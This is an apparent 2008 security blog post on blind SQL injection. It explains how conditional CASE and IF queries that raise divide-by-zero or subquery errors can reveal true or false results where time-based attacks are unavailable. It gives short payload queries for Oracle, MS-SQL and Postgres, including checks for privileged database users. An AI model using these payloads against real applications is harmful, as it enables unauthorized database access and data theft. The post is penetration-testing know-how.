If Query Data Manipulation

May 26, 2008

Occasionally when exploiting SQL injections there are conditions when application does not show different pages for true and false result of sql query. If the database server does not resolve host names(thus prohibiting out of band attacks), the attack vector that is used to exploit such conditions is to use functions such as 'waitfor delay' which makes database sleep for specified seconds. Thus a true condition will return the output with a time delay whereas a false condition will result in prompt response.

In some cases application returns different output(or error) if the syntax of the SQL query is wrong. In these conditions instead of carrying out time based attacks one could use the if statements to manipulate the sql query.

The following query will return a divide by zero error when the condition is true:-

Oracle:-

select case when user='SYS' then 1/0 else (select 1 from dual) end from dual 

MS-SQL :-

if ((select user) = 'sa' OR (select user) = 'dbo') select 1/0 else select 1 

update:- select case when( 1=1) then 1 else 1/0 end  

POSTGRES :-

SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END;

update:-case when (1=1) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 

MY-SQL:- 

Doesn't work. Careful, there is a IF query handling Denial OF service which kills the database in old versions. 

update:- select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1 

returns error 'multiple rows returned by subquery'  when the condition is false 

— 

Thanks pentestmonkey for providing some useful queries 

— 

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback